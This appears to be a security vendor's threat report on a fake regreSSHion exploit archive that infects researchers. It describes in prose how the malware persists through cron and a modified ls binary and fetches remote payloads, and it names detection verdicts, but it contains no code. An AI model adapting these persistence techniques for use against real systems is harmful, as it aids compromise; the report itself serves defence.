An archive containing malicious code is being distributed on the social network X (formerly known as Twitter), under the guise of an exploit for the recently discovered CVE-2024-6387 aka regreSSHion. According to our experts, this may be an attempt to attack cybersecurity specialists. In this post we explain what actually is in the archive and how attackers are trying to lure researchers into a trap.
The legend behind the archive
Presumably, there is a server that has a working exploit for the CVE-2024-6387 vulnerability in OpenSSH. Moreover, this server actively uses this exploit to attack a list of IP addresses. The archive, offered to anyone wishing to investigate this attack, allegedly contains a working exploit, a list of IP addresses and some kind of payload.
Real contents of the malicious archive
In fact, the archive contains some source code, a set of malicious binaries and scripts. The source code looks like a slightly edited version of a non-functional proof-of-concept for this vulnerability, which was already distributed in the public domain.
One of the scripts, written in Python, simulates the exploitation of a vulnerability on servers located at IP addresses from the list. In reality, it launches a malicious file called exploit — a malware that serves to achieve persistence in the system and to retrieve additional payload from a remote server. The malicious code is saved in a file located at the /etc/cron.hourly directory. In order to achieve persistence, it modifies the ls file and writes a copy of itself into it, repeating the execution of malicious code every time it is launched.
How to Stay Safe
Apparently, the authors of the attack are counting on the fact that, when working with obviously malicious code, researchers tend to disable security solutions and focus on analyzing the exchange of data between the malware and a server vulnerable to CVE-2024-6387. Meanwhile, completely different malicious code will be used to compromise the researchers’ computers.
Therefore, we remind all information security experts and other persons who like to analyze suspicious code not to work with malware outside of a specially prepared isolated environment, from which external infrastructure is inaccessible.
Kaspersky products detect elements of this attack with the following verdicts:
- UDS:Trojan-Downloader.Shell.FakeChecker.a
- UDS:Trojan.Python.FakeChecker.a
- HEUR:Trojan.Linux.Agent.gen
- Virus.Linux.Lamer.b
- HEUR:DoS.Linux.Agent.dt
As for the regreSSHion vulnerability, as we wrote earlier, its practical exploitation is far from being simple.